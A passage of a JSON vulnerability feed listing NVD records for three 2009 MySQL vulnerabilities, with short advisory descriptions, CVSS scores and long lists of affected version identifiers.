"cpe:2.3:a:oracle:mysql:5.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.56:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.5.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.82:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.23:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:23", "description": "The vio_verify_callback function in viosslfactories.c in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used, accepts a value of zero for the depth of X.509 certificates, which allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL servers via a crafted certificate, as demonstrated by a certificate presented by a server linked against the yaSSL library.", "edition": 6, "cvss3": {}, "published": "2009-11-30T17:30:00", "title": "CVE-2009-4028", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4028"], "modified": "2019-12-17T20:26:00", "cpe": ["cpe:/a:oracle:mysql:5.0.27", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.0.4", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:oracle:mysql:5.1.13", "cpe:/a:mysql:mysql:5.0.0", "cpe:/a:oracle:mysql:5.1.28", "cpe:/a:oracle:mysql:5.0.81", "cpe:/a:oracle:mysql:5.1.40", "cpe:/a:oracle:mysql:5.1.17", "cpe:/a:oracle:mysql:5.1.30", "cpe:/a:oracle:mysql:5.1.21", "cpe:/a:oracle:mysql:5.1.36", "cpe:/a:oracle:mysql:5.0.30", "cpe:/a:oracle:mysql:5.0.85", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:oracle:mysql:5.1", "cpe:/a:oracle:mysql:5.1.16", "cpe:/a:oracle:mysql:5.0.12", "cpe:/a:oracle:mysql:5.0.38", "cpe:/a:oracle:mysql:5.0.51", "cpe:/a:mysql:mysql:5.0.66", "cpe:/a:oracle:mysql:5.0.7", "cpe:/a:oracle:mysql:5.0.19", "cpe:/a:mysql:mysql:5.0.60", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:oracle:mysql:5.1.24", "cpe:/a:oracle:mysql:5.0.23", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:oracle:mysql:5.1.29", "cpe:/a:oracle:mysql:5.1.37", "cpe:/a:mysql:mysql:5.0.24", "cpe:/a:oracle:mysql:5.1.3", "cpe:/a:oracle:mysql:5.0.86", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:oracle:mysql:5.1.27", "cpe:/a:oracle:mysql:5.0.21", "cpe:/a:oracle:mysql:5.0.33", "cpe:/a:oracle:mysql:5.1.8", "cpe:/a:oracle:mysql:5.1.11", "cpe:/a:oracle:mysql:5.1.38", "cpe:/a:oracle:mysql:5.0.0", "cpe:/a:mysql:mysql:5.0.22.1.0.1", "cpe:/a:oracle:mysql:5.1.25", "cpe:/a:oracle:mysql:5.0.26", "cpe:/a:mysql:mysql:5.0.84", "cpe:/a:oracle:mysql:5.1.35", "cpe:/a:oracle:mysql:5.1.14", "cpe:/a:oracle:mysql:5.1.1", "cpe:/a:oracle:mysql:5.1.2", "cpe:/a:oracle:mysql:5.0.32", "cpe:/a:mysql:mysql:5.0.20", "cpe:/a:oracle:mysql:5.1.4", "cpe:/a:oracle:mysql:5.1.18", "cpe:/a:oracle:mysql:5.0.52", "cpe:/a:oracle:mysql:5.1.10", "cpe:/a:oracle:mysql:5.1.12", "cpe:/a:oracle:mysql:5.1.39", "cpe:/a:mysql:mysql:5.0.30", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:oracle:mysql:5.0.13", "cpe:/a:oracle:mysql:5.0.45", "cpe:/a:oracle:mysql:5.1.34", "cpe:/a:oracle:mysql:5.1.22", "cpe:/a:mysql:mysql:5.0.54", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:oracle:mysql:5.1.26", "cpe:/a:oracle:mysql:5.0.83", "cpe:/a:oracle:mysql:5.0.41", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:oracle:mysql:5.1.19", "cpe:/a:oracle:mysql:5.1.9", "cpe:/a:oracle:mysql:5.0.14", "cpe:/a:oracle:mysql:5.0.11", "cpe:/a:oracle:mysql:5.0.75", "cpe:/a:mysql:mysql:5.0.56", "cpe:/a:mysql:mysql:5.0.44", "cpe:/a:oracle:mysql:5.1.15", "cpe:/a:oracle:mysql:5.0.25", "cpe:/a:oracle:mysql:5.0.8", "cpe:/a:mysql:mysql:5.0.5.0.21", "cpe:/a:oracle:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:oracle:mysql:5.0.77", "cpe:/a:oracle:mysql:5.1.6", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:oracle:mysql:5.0.6", "cpe:/a:oracle:mysql:5.1.23", "cpe:/a:mysql:mysql:5.0.82", "cpe:/a:oracle:mysql:5.1.20", "cpe:/a:mysql:mysql:5.0.36", "cpe:/a:oracle:mysql:5.0.3", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:mysql:mysql:5.0.87", "cpe:/a:oracle:mysql:5.0.37", "cpe:/a:oracle:mysql:5.1.7", "cpe:/a:oracle:mysql:5.1.31", "cpe:/a:oracle:mysql:5.0.50", "cpe:/a:oracle:mysql:5.0.42", "cpe:/a:oracle:mysql:5.0.18", "cpe:/a:oracle:mysql:5.0.22", "cpe:/a:mysql:mysql:5.0.17"], "id": "CVE-2009-4028", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4028", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:mysql:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.81:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.30:sp1:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.22.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.30:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.25:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.33:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.27:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.77:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.66:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.34:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.39:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.87:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.75:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.38:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.83:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.60:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.86:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.36:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.40:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.28:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.37:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.3:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.34:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.31:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.26:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.23:a:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.24:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.51:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.32:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.52:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.84:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.85:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.40:sp1:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.31:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.37:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.56:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.29:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.5.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.82:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.23:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:54:19", "description": "MySQL 5.1.x before 5.1.41 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079.", "edition": 4, "cvss3": {}, "published": "2009-11-30T17:30:00", "title": "CVE-2009-4030", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4030"], "modified": "2019-12-17T20:07:00", "cpe": ["cpe:/a:mysql:mysql:5.1.23", "cpe:/a:oracle:mysql:5.1.13", "cpe:/a:oracle:mysql:5.1.17", "cpe:/a:oracle:mysql:5.1.30", "cpe:/a:oracle:mysql:5.1.21", "cpe:/a:oracle:mysql:5.1", "cpe:/a:oracle:mysql:5.1.16", "cpe:/a:oracle:mysql:5.1.3", "cpe:/a:oracle:mysql:5.1.8", "cpe:/a:oracle:mysql:5.1.11", "cpe:/a:oracle:mysql:5.1.14", "cpe:/a:oracle:mysql:5.1.1", "cpe:/a:oracle:mysql:5.1.2", "cpe:/a:oracle:mysql:5.1.4", "cpe:/a:oracle:mysql:5.1.18", "cpe:/a:oracle:mysql:5.1.10", "cpe:/a:oracle:mysql:5.1.12", "cpe:/a:oracle:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:oracle:mysql:5.1.19", "cpe:/a:oracle:mysql:5.1.9", "cpe:/a:oracle:mysql:5.1.15", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:oracle:mysql:5.1.6", "cpe:/a:oracle:mysql:5.1.20", "cpe:/a:oracle:mysql:5.1.7"], "id": "CVE-2009-4030", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4030", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:mysql:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.30:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.32:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.15:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:54:19", "description": "mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.", "edition": 4, "cvss3": {}, "published": "2009-11-30T17:30:00", "title": "CVE-2009-4019", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4019"], "modified": "2019-12-17T20:26:00", "cpe": ["cpe:/a:oracle:mysql:5.0.27", "cpe:/a:mysql:mysql:5.0.4", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:oracle:mysql:5.1.13", "cpe:/a:mysql:mysql:5.0.0", "cpe:/a:oracle:mysql:5.0.81", "cpe:/a:oracle:mysql:5.1.17", "cpe:/a:oracle:mysql:5.1.30", "cpe:/a:oracle:mysql:5.1.21", "cpe:/a:oracle:mysql:5.0.30", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:oracle:mysql:5.1", "cpe:/a:oracle:mysql:5.1.16", "cpe:/a:oracle:mysql:5.0.12", "cpe:/a:oracle:mysql:5.0.38", "cpe:/a:oracle:mysql:5.0.51", "cpe:/a:mysql:mysql:5.0.66", "cpe:/a:oracle:mysql:5.0.7", "cpe:/a:oracle:mysql:5.0.19", "cpe:/a:mysql:mysql:5.0.60", "cpe:/a:oracle:mysql:5.0.23", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:oracle:mysql:5.0.51a", "cpe:/a:mysql:mysql:5.0.24", "cpe:/a:oracle:mysql:5.1.3", "cpe:/a:oracle:mysql:5.0.21", "cpe:/a:oracle:mysql:5.0.33", "cpe:/a:oracle:mysql:5.1.8", "cpe:/a:oracle:mysql:5.1.11", "cpe:/a:oracle:mysql:5.0.0", "cpe:/a:mysql:mysql:5.0.22.1.0.1", "cpe:/a:oracle:mysql:5.0.26", "cpe:/a:oracle:mysql:5.1.14", "cpe:/a:oracle:mysql:5.1.1", "cpe:/a:oracle:mysql:5.1.2", "cpe:/a:oracle:mysql:5.0.32", "cpe:/a:mysql:mysql:5.0.20", "cpe:/a:oracle:mysql:5.1.4", "cpe:/a:oracle:mysql:5.1.18", "cpe:/a:oracle:mysql:5.0.52", "cpe:/a:oracle:mysql:5.1.10", "cpe:/a:oracle:mysql:5.1.12", "cpe:/a:mysql:mysql:5.0.30", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:oracle:mysql:5.0.13", "cpe:/a:oracle:mysql:5.0.45", "cpe:/a:oracle:mysql:5.1.22", "cpe:/a:mysql:mysql:5.0.54", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:oracle:mysql:5.0.83", "cpe:/a:oracle:mysql:5.0.41", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:oracle:mysql:5.1.19", "cpe:/a:oracle:mysql:5.1.9", "cpe:/a:oracle:mysql:5.0.14", "cpe:/a:oracle:mysql:5.0.11", "cpe:/a:oracle:mysql:5.0.75", "cpe:/a:mysql:mysql:5.0.56", "cpe:/a:mysql:mysql:5.0.44", "cpe:/a:oracle:mysql:5.1.15", "cpe:/a:oracle:mysql:5.0.25", "cpe:/a:oracle:mysql:5.0.8", "cpe:/a:mysql:mysql:5.0.5.0.21", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:oracle:mysql:5.0.77", "cpe:/a:oracle:mysql:5.1.6", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:oracle:mysql:5.0.6", "cpe:/a:mysql:mysql:5.0.82", "cpe:/a:oracle:mysql:5.1.20", "cpe:/a:mysql:mysql:5.0.36", "cpe:/a:oracle:mysql:5.0.3", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:oracle:mysql:5.0.37", "cpe:/a:oracle:mysql:5.1.7", "cpe:/a:oracle:mysql:5.0.50", "cpe:/a:oracle:mysql:5.0.42", "cpe:/a:oracle:mysql:5.0.18", "cpe:/a:oracle:mysql:5.0.22", "cpe:/a:mysql:mysql:5.0.17"], "id": "CVE-2009-4019", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4019", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:mysql:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.81:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.30:sp1:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.22.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.30:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.77:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.66:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.75:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.83:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.60:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.3:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.51a:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.51:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.1.32:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.52:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.10:*:*:*:*:*:*:*", 